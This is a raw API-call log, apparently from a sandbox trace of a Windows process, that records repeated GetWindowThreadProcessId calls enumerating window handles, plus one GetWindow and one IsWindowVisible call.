	[0913.134] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.134] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x778
	[0913.134] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x778
	[0913.134] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.134] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.134] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.135] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.135] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.135] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.135] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.135] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.135] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x460
	[0913.135] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.135] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4d0
	[0913.136] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x2440
	[0913.136] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x24d8
	[0913.136] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1aa4
	[0913.136] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1ff0
	[0913.136] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1a84
	[0913.136] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1fb0
	[0913.136] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1e10
	[0913.136] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x23a8
	[0913.137] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1f24
	[0913.137] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x21ec
	[0913.137] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x2320
	[0913.137] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1fd4
	[0913.137] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1880
	[0913.137] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1b18
	[0913.137] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1d6c
	[0913.137] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x233c
	[0913.138] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x2368
	[0913.138] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x2124
	[0913.138] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x22f0
	[0913.138] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x22ac
	[0913.138] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1cdc
	[0913.138] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x10f0
	[0913.138] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1f18
	[0913.138] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x20a8
	[0913.139] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x2004
	[0913.139] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1f88
	[0913.139] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1f84
	[0913.139] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x2050
	[0913.139] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1e04
	[0913.139] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1ecc
	[0913.139] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1e64
	[0913.140] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1b58
	[0913.140] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1e94
	[0913.140] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1e28
	[0913.140] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1df8
	[0913.140] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1da8
	[0913.140] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1c70
	[0913.140] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x163c
	[0913.141] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1a10
	[0913.141] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x186c
	[0913.141] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1d74
	[0913.141] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x4c8
	[0913.141] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1960
	[0913.141] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1ce4
	[0913.141] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1b24
	[0913.141] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x14e0
	[0913.142] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x17f0
	[0913.142] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x854
	[0913.142] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1268
	[0913.142] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1624
	[0913.142] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1b9c
	[0913.142] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x16f4
	[0913.142] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x145c
	[0913.142] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x17d0
	[0913.143] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1d28
	[0913.143] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xcb8
	[0913.143] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1190
	[0913.143] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x3a8
	[0913.143] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1bd0
	[0913.143] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1bfc
	[0913.143] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1a78
	[0913.143] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1b90
	[0913.144] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1b04
	[0913.144] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1b34
	[0913.144] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1b64
	[0913.144] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1bb0
	[0913.144] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1acc
	[0913.144] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1a2c
	[0913.144] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x19a8
	[0913.145] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1944
	[0913.145] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x18c8
	[0913.145] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x18ac
	[0913.145] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x18ec
	[0913.145] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1898
	[0913.145] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xc98
	[0913.145] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x153c
	[0913.145] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1808
	[0913.146] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x12a4
	[0913.146] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1740
	[0913.146] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x16c4
	[0913.146] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1820
	[0913.146] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x16ac
	[0913.146] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1858
	[0913.146] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1664
	[0913.146] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x10b4
	[0913.147] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x10ac
	[0913.147] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x10ec
	[0913.147] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1068
	[0913.147] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x17e0
	[0913.147] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x102c
	[0913.147] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x17a4
	[0913.147] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1050
	[0913.147] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1694
	[0913.147] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1770
	[0913.148] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1720
	[0913.148] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x165c
	[0913.148] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1578
	[0913.148] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x16c0
	[0913.148] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x161c
	[0913.148] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1638
	[0913.148] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x15c8
	[0913.148] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1554
	[0913.149] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1674
	[0913.149] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1520
	[0913.149] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x14bc
	[0913.149] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xf8c
	[0913.149] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xe9c
	[0913.150] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1434
	[0913.150] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x14ec
	[0913.150] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xfcc
	[0913.150] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x12ac
	[0913.150] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1484
	[0913.150] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x934
	[0913.150] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xc0c
	[0913.150] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xb08
	[0913.151] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x948
	[0913.151] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1178
	[0913.151] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x13e0
	[0913.151] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xcd0
	[0913.152] GetWindow (hWnd=0x105ea, uCmd=0x4) returned 0x0
	[0913.153] IsWindowVisible (hWnd=0x105ea) returned 0
	[0913.153] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x13fc
	[0913.153] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xdc8
	[0913.153] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xc18
	[0913.153] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xc2c
	[0913.153] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xa1c
	[0913.153] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1244
	[0913.153] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xdb0
	[0913.154] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1398
	[0913.154] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1358
	[0913.154] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1370
	[0913.154] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1340
	[0913.154] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x130c
	[0913.154] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x12c0
	[0913.154] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x12e4
	[0913.154] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1270
	[0913.154] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1298
	[0913.155] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x120c
	[0913.155] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x122c
	[0913.155] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x11c4
	[0913.155] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x11b0
	[0913.155] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1188
	[0913.155] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1148
	[0913.155] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x1160
	[0913.156] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x10fc
	[0913.156] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xe34
	[0913.156] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xea4
	[0913.156] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x514
	[0913.156] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xe48
	[0913.156] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xbc8
	[0913.156] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xdf8
	[0913.156] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x318
	[0913.156] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xcac
	[0913.157] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x8bc
	[0913.157] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xf9c
	[0913.157] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xf48
	[0913.157] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xe40
	[0913.157] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xecc
	[0913.157] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xeb8
	[0913.157] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xe80
	[0913.157] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xe98
	[0913.158] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xe60
	[0913.158] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xee4
	[0913.158] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xf00
	[0913.158] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xdf0
	[0913.158] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xe1c
	[0913.158] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xdd0
	[0913.158] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xd94
	[0913.158] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xd74
	[0913.158] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xd00
	[0913.159] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xcd8
	[0913.159] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xc84
	[0913.159] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xca4
	[0913.159] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xc64
	[0913.159] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xc24
	[0913.159] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xb84
	[0913.159] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xbac
	[0913.159] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x384
	[0913.160] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xab8
	[0913.160] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x33c
	[0913.160] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xa44
	[0913.160] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0xa64
	[0913.160] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x24dca0 | out: lpdwProcessId=0x24dca0) returned 0x8a8
